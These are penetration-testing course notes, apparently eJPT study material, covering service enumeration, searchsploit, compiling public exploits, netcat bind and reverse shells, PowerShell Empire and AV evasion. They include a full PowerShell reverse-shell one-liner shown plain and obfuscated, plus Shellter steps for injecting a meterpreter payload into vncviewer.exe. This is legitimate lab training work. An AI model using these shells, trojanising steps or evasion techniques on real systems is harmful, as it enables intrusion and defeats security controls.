
⚡ Prerequisites

  • Basic familiarity with Linux & Windows

  • Basic understanding of TCP & UDP protocols

  • Basic familiarity with Metasploit

📕 Learning Objectives

  • Identify services vulnerabilities

  • Search for and manipulate public exploit code

  • Utilize exploitation frameworks, bind & reverse shells

  • Perform exploitation in a black box pentest

  • Evade signature-based antivirus solutions

🔬 Training list - PentesterAcademy/INE Labs

subscription required

🔬 Home Labs

Exploitation Introduction

🗒️ Exploitation is a phase of a penetration test that focuses on establishing access, initial foothold, to a system or resource by bypassing security restrictions.

With a proper vulnerability analysis, the exploitation attack vector should focus on the success probability and the high value target assets with the highest impact on the scanned organization.

  • The use of automated exploitation tools (Metasploit, Powershell Empire, etc) shouldn't be prevalent

  • Exploitation methodology:

    • Identify Vulnerable Services

    • Prepare Exploit Code

    • Gaining Remote access

    • Bypass AV detection

    • Pivoting

Vulnerability Scanning

  • Identify running and vulnerable services

🗒️ Banner grabbing is the info gathering manual or automatic process used to obtain software and services name and version. The host server displays a text with this information as a banner.

Tools and techniques:

  • nmap service version detection scan

  • Netcat connection

  • Authentication with a supported service

  • curl / wget to get headers details of an HTTP server

🔬 Check the SSH Enumeration Lab here

Some useful commands from the lab environment:

  • nmap

nmap -sV -O <TARGET_IP>
	22/tcp open  ssh   OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
ls -al /usr/share/nmap/scripts | grep banner
nmap -sV --script=banner <TARGET_IP>

	|_banner: SSH-2.0-OpenSSH_7.2p2 Ubuntu 4ubuntu2.6
  • nc / netcat

nc <TARGET_IP> 22

	SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.6
  • SSH Authentication

ssh root@<TARGET_IP>
	Welcome to attack defense ssh recon lab!! # SSH Welcome Banner

🗒️ Nmap Engine Scripting (NSE) - an nmap feature that allows to write simple scripts to automate a wide variety of tasks, like:

  • network discovery

  • sophisticated version detection

  • vulnerability detection and exploitation

  • backdoor detection

Scripts are written using the Lua programming language.

Nmap script default directory is:

  • /usr/share/nmap/scripts

ls -al /usr/share/nmap/scripts | grep <keyword>

🔬 Check the Bash - ShellShock Lab here

Some useful commands and nmap script scan from the lab environment:

nmap -sV -O <TARGET_IP>
	80/tcp open  http  Apache httpd 2.4.6 ((Unix))
nmap -sV -p 80 --script=http-enum <TARGET_IP>

ls -al /usr/share/nmap/scripts | grep shellshock

nmap -sV --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" <TARGET_IP>

# Vulnerable to the CVE-2014-6271

Focus on the techniques and the flow to detect vulnerabilities.

🔬 Home Lab based on a Windows 7/2008 R2 target vulnerable to EternalBlue SMB RCE. Check the Lab 2 here

sudo nmap -sS -sV <TARGET_IP>
searchsploit EternalBlue
searchsploit ms17-010
# Check the vulnerability with a scanner, before trying to exploit it

search eternalblue
use auxiliary/scanner/smb/smb_ms17_010

use exploit/windows/smb/ms17_010_eternalblue

Searching for Exploits

Exploit code can be found online or inside locally-stored exploit database in pentest Linux distributions (searchsploit, MSF).

Verifiable online sources:

Always pay attention at publicly available exploits. An exploit can be weaponized to attack the actual attacker system!

📌 Analyze the exploit code behavior to ensure that it works as intended.

🗒️ searchsploit - command line search tool for Exploit-Db that allows to have an offline copy of the Exploit-Db.

  • Useful for security assessments on networks without Internet access

  • Pre-packed with Kali Linux

  • exploitdb local directory is:

    • /usr/share/exploitdb

# Debian-based distro install
sudo apt update && sudo apt -y install exploitdb
ls -al /usr/share/exploitdb

# Update the exploitdb package updates
searchsploit -u
searchsploit [options] <term>
searchsploit vsftpd 2.3.4

# Copy an exploit to the current working dir
searchsploit -m 49757    

# Case sensitive search
searchsploit -c OpenSSH

# Search just the exploit title
searchsploit -t vsftpd

# Exact search on title
searchsploit -e "Windows 7"

# Filters search
searchsploit remote windows smb
searchsploit remote linux ssh
searchsploit remote linux ssh OpenSSH
searchsploit remote webapps wordpress
searchsploit local windows
searchsploit local windows | grep -e "Microsoft"

# List online links
searchsploit -w remote windows smb | grep -e "EternalBlue"

Fixing Exploits

🔬 Check the Fixing Exploits Lab here

Cross-Compiling Exploits

Exploit code developed in C, C++, C# has to be compiled into a portable executable or binary.

🗒️ Cross-compilation is the process of building on one platform a binary that will run on another platform.

  • Compiling C code is a necessary skill

📌 ExploitDB bin-sploits - useful for pre-compiled binaries

e.g. of Windows and Linux exploit code compiling


sudo apt -y install mingw-w64 gcc


  • Download the VLC exploit or use searchsploit

searchsploit VideolAN VLC SMB
searchsploit -m 9303
  • Compile the C exploit

    • check for comments in the code regarding the compilation commands

# Compile for x64
x86_64-w64-mingw32-gcc 9303.c -o exploit64.exe

# Compile for x86 (32-bit)
i686-w64-mingw32-gcc 9303.c -o exploit32.exe


  • Download the DirtyCow exploit or use searchsploit

searchsploit Dirty Cow
searchsploit -m 40839
  • Compile the C exploit

    • check for comments in the code regarding the compilation commands to compile it successfully

# Compile with
gcc -pthread 40839.c -o dirty_exploit -lcrypt

Bind & Reverse Shells

nc - a network utility used for a variety of tasks associated with TCP/UDP.

  • Client mode - used for connection to any TCP/UDP port or to a listener

  • Server Mode - used as a listener for connection from clients on a specific port


  • open TCP connections, listen on TCP or UDP ports

  • Banner grabbing, Port scanning, Files transferring

  • Bind/Reverse shells

# Debian based distro - install
sudo apt update && sudo apt install -y netcat

🔬 Some HFS Lab commands

nc -nv 80
# -n = no DNS resolution
# -v = verbose

nc -nvu 445
# -u = UDP port

Setup a listener:

  • Transfer nc.exe to the windows target

# Attacker machine
ip -br -c a
cd /usr/share/windows-binaries/
python -m SimpleHTTPServer 80

# Target machine
cd Desktop
certutil -urlcache -f nc.exe
  • Setup a listener on the attacker machine

# Attacker machine
nc -nvlp 1234
nc -nvlup 1234 # listen on a UDP port

# Target machine
nc.exe -nv 1234
nc.exe -nvu 1234

# A connection is received on the Attacker machine
  • Transfer files with nc

# A listener must be present on the target system
# Target machine
nc.exe -nvlp 1234 > test.txt

# Attacker machine
echo "Hello target" > test.txt
nc -nv 1234 < test.txt

Bind Shells

📌 Bind and Reverse shells

🗒️ Bind Shell - a remote shell where the attacker connects to the listener running on the target system and execute commands on the target system.

  • Bind shells issues:

    • Must have access to the target system

    • Inbound traffic can be blocked by a firewall, it is very suspect

  • A netcat listener must be configured on the target system to execute:

  • cmd.exe - Windows

  • /bin/bash - Linux

🔬 Same lab as above (IPs might change)

  • Once uploaded the nc.exe on the target system, proceed with the bind shell

# Target Win machine - Bind shell listener with executable cmd.exe
nc.exe -nvlp 1234 -e cmd.exe

# Attacker Linux machine
nc -nv 1234
# Target Linux machine - Bind shell listener with /bin/bash
nc -nvlp 1234 -c /bin/bash

# Attacker Win machine
nc.exe -nv 1234

Reverse Shells

🗒️ Reverse Shell - a remote shell where the target connects to a listener running on the attacker's system (e.g. Metasploit Meterpreter).

  • Reverse shells advantages:

    • The connection can be initialized without netcat too

    • Outgoing traffic may not be blocked by firewalls

  • Reverse shells issues:

    • used exploit have to know the attacker's IP

    • the attacker's IP can be logged as malicious or present in the exploit file

# Attacker Linux machine
nc -nvlp 1234

# Target Win machine
nc.exe -nv 1234 -e cmd.exe
# Attacker Linux machine
nc -nvlp 1234

# Target Linux machine (localhost in this case)
nc -nv 1234 -e /bin/bash

Reverse Shell without Netcat

📌 PayloadsAllTheThings - Reverse Shell Cheatsheet

  • Examples of Reverse Shell with different code (bash, Python, Powershell, PHP, etc)

📌 Reverse Shell Generator


# Kali Linux attacker machine
nc -nvlp 9001
# Windows target machine
# Run CMD and paste the code below
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Exploitation Frameworks

  • Focus on the Exploitation phase

  • Modular

  • MSF turns the exploit code into a module, using the Ruby programming language

🔬 Check the Workflow Platform Lab here

Empire - PowerShell post-exploitation framework for Win, Linux and macOS

Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers. The Empire server is written in Python 3 and is modular to allow operator flexibility. Empire comes built-in with a client that can be used remotely to access the server. There is also a GUI available for remotely accessing the Empire server, Starkiller.

  • PowerShell-Empire is primarily designed for Windows targets

  • Starkiller - GUI frontend for PowerShell-Empire

sudo apt update && sudo apt install -y powershell-empire

🔬 Home Lab based on a Kali Linux attacker VM and Win7 target VM with IP

sudo powershell-empire server
  • In another terminal tab

sudo powershell-empire client
  • Open Starkiller

    • http://localhost:1337/index.html#/

    • Credentials: empireadmin:password123

  • Run the csharpserver

  • Create a http listener to receive the reverse connection from the target system

  • Generate a Stager with windows_csharp_exe type

  • Actions - Download the Sharpire.exe stager

# Open a new terminal window
cd Downloads
python3 -m http.server 80

# On the Windows VM download the Sharpire.exe from
# Run it
  • Back on the Starkiller Agents page, check for the active agent

  • Back in the Empire terminal session

interact <ID>

Windows Black Box Exploitation

🗒️ Black Box penetration test - security assessment conducted without any internal system or network knowledge.

  • The pentester act like an external unprivileged hacker from outside the network

  • No information about the target system

Typical Black Box Methodology:

  • Host discovery ➡️ Port Scanning ➡️ Enumeration

  • Vulnerability detection

  • Exploitation ➡️ Manual/Automated

  • Post Exploitation - PrivEsc ➡️ Persistence ➡️ Dumping Hashes



  • Penetration Test to gain access and exploit a Win Server 2008 host.


  • Identify running and vulnerable services on the target

  • Exploit the vulnerabilities to obtain a foothold

🔬 The techniques will be covered in the dedicated Win Black Box Pentest Lab here. This is a lab containing a Metasploitable3 target.

  • Identify easily exploitable services

  • Pick the target as efficiently as possible

  • Time is a factor

Linux Black Box Exploitation


  • Penetration Test to gain access and exploit a Linux server host.


  • Identify running and vulnerable services on the target

  • Exploit the vulnerabilities to obtain a foothold and gain access to the system

🔬 The techniques will be covered in the dedicated Linux Black Box Pentest Lab here. This is a lab containing a Metasploitable2 target.

AV Evasion & Obfuscation

🗒️ Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. (MITRE)

  • Antivirus detection methods can be classified as follows:


Signature based detection

A signature is a static unique sequence of bytes of known malware, created using essential elements of an analyzed file. The AV comes with a signature database

Heuristic base detection

Statically examine files for suspicious specific characteristics, relying on rules to determine a malicious binary

Behavior based detection

Monitor malware for suspicious behavior

  • On-disk Evasion techniques

    • Obfuscation - The act of hiding anything crucial, useful, or vital. Code is reorganized through obfuscation to make it more difficult to decipher or reverse engineer.

    • Encoding - The process of transforming data into a new format using an encoding strategy. Data can be encoded to a new format and then decoded back to its original format since encoding is a reversible operation.

    • Packing - Generate executables with updated binary structures, lower in size and a new payload's signature.

    • Crypters - Encrypts payloads, then the encrypted code is decrypted in memory. The decryption key is typically kept in a stub. (ransomware)

  • In-memory Evasion techniques

    • Memory manipulation rather than writing files to disk

    • Payload is injected into a process, then executed in memory in a separate thread

Shellter - dynamic shellcode injection tool and dynamic PE (Portable Executable) infector ever created.

  • Uses a unique dynamic approach based on the execution flow of the target app

  • Takes advantage of the original structure of the PE file

  • Supports any 32-bit payload (generated either by metasploit or custom ones by the user)

  • Portable

  • Compatible with Windows x86/x64 (XP SP3 and above) & Wine/CrossOver for Linux/Mac

🔬 Home lab with Kali Linux and Win7 VMs

Shellter Kali Linux Installation:

sudo apt update && sudo apt install -y shellter

# Wine64 will be automatically installed
# Win32 needs additional commands to install it
sudo dpkg --add-architecture i386 && sudo apt update && sudo apt -y install wine32
rm -r ~/.wine
cd /usr/share/windows-resources/shellter
  • Execute an exe file on Linux

sudo shellter
  • Inject the shellcode into/usr/share/windows-binaries/vncviewer.exe file after copying it to a folder

mkdir AVBypass
cd AVBypass
cp /usr/share/windows-binaries/vncviewer.exe .
  • In the SHELLTER windows, choose A for automatic

  • PE Target: /home/kali/certs/ejpt/AVBypass/vncviewer.exe

  • Stealth Mode: Y = vncviewer will function as normal and the shellcode will be executed in the background

  • Payload: L - 1

  • LHOST: Attacker's IP -

  • LPORT: 1234

  • Now the /home/kali/certs/ejpt/AVBypass/vncviewer.exe file has been replaced by the Shellter generated malicious executable

  • Copy the vncviewer.exe file to the target machine

# Attacker VM
cd /home/kali/certs/ejpt/AVBypass/
sudo python -m http.server 80

# In another terminal
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 1234
  • Run the vncviewer.exe file and chheck the msfconsole Meterpreter session

PowerShell Code Obfuscation

Invoke-Obfuscation - a PowerShell v2.0+ compatible PowerShell command and script obfuscator.

🔬 Home lab with Kali Linux and Win7 VMs

  • Kali Linux install PowerShell

cd /opt
sudo git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
sudo apt update && sudo apt install -y powershell
  • Run pwsh

cd /opt/Invoke-Obfuscation/
Import-Module ./Invoke-Obfuscation.psd1
cd ..
  • Create the reverse PowerShell script in a new file

    • PowerShell Reverse Shell code will be

cd /home/kali/certs/ejpt/AVBypass/    
nano shell.ps1
$client = New-Object System.Net.Sockets.TCPClient('',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
  • Back in Invoke-Obfuscation

SET SCRIPTPATH /home/kali/certs/ejpt/AVBypass/shell.ps1
  • Obfuscated code is:

Set-Variable -Name client -Value (New-Object System.Net.Sockets.TCPClient('',4242));Set-Variable -Name stream -Value ($client.GetStream());[byte[]]$bytes = 0..65535|%{0};while((Set-Variable -Name i -Value ($stream.Read($bytes, 0, $bytes.Length))) -ne 0){;Set-Variable -Name data -Value ((New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i));Set-Variable -Name sendback -Value (iex $data 2>&1 | Out-String );Set-Variable -Name sendback2 -Value ($sendback + 'PS ' + (pwd).Path + '> ');Set-Variable -Name sendbyte -Value (([text.encoding]::ASCII).GetBytes($sendback2));$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
cd /home/kali/certs/ejpt/AVBypass/    
nano obfuscated.ps1
# Attacker VM another terminal
cd /home/kali/certs/ejpt/AVBypass/
sudo python -m http.server 80

nc -nvlp 4242
  • Run the obfuscated.ps1 file on the Win10 VM

  • Back on the Kali VM check the PowerShell reverse shell

Last updated

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